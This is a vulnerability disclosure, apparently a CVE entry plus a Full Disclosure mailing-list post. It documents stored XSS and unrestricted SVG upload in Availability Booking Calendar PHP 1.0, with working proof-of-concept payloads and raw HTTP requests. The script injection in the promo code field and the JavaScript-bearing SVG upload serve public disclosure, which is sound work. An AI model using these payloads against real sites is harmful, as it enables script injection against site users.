Headline
CVE-2023-3970: Full Disclosure: Availability Booking Calendar PHP
A vulnerability, which was classified as problematic, was found in GZ Scripts Availability Booking Calendar PHP 1.0. This affects an unknown part of the file /index.php?controller=GzUser&action=edit&id=1 of the component Image Handler. The manipulation of the argument img leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235569 was assigned to this vulnerability.
Full Disclosure mailing list archives****Availability Booking Calendar PHP - Stored XSS and Unrestricted File Upload
From: Andrey Stoykov <mwebsec () gmail com>
Date: Sat, 22 Jul 2023 22:39:05 +0300
# Exploit Title: Availability Booking Calendar PHP - Multiple Issues
Date: 07/2023
Exploit Author: Andrey Stoykov
Tested on: Ubuntu 20.04
Blog: http://msecureltd.blogspot.com
XSS #1:
Steps to Reproduce:
- Browse to Bookings
- Select All Bookings
- Edit booking and select Promo Code
- Enter payload TEST"><script>alert(`XSS`)</script>
// HTTP POST request
POST /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit HTTP/1.1 Host: hostname User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 […]
[…] edit_booking=1&calendars_price=900&extra_price=0&tax=10&deposit=91&promo_code=TEST%22%3E%3Cscript%3Ealert%28%60XSS%60%29%3C%2Fscript%3E&discount=0&total=910&create_booking=1 […]
// HTTP response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 205 […]
// HTTP GET request to Bookings page
GET /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit&id=2 HTTP/1.1 Host: hostname User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 […]
// HTTP response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 33590 […]
[…] <label class="control-label" for="promo_code">Promo code:</label> <input id="promo_code" class="form-control input-sm" type="text" name="promo_code" size="25" value="TEST"><script>alert(`XSS`)</script>" title="Promo code" placeholder=""> </div> […]
Unrestricted File Upload #1:
// SVG file contents
<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd";>
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg";> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(`XSS`); </script> </svg>
Steps to Reproduce:
- Browse My Account
- Image Browse -> Upload
- Then right click on image
- Select Open Image in New Tab
// HTTP POST request
POST /AvailabilityBookingCalendarPHP/index.php?controller=GzUser&action=edit&id=1 HTTP/1.1 Host: hostname User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 […]
[…] -----------------------------13831219578609189241212424546 Content-Disposition: form-data; name="img"; filename="xss.svg" Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd";>
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg";> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(`XSS`); </script> </svg> […]
// HTTP response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 190 […] _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- Availability Booking Calendar PHP - Stored XSS and Unrestricted File Upload Andrey Stoykov (Jul 25)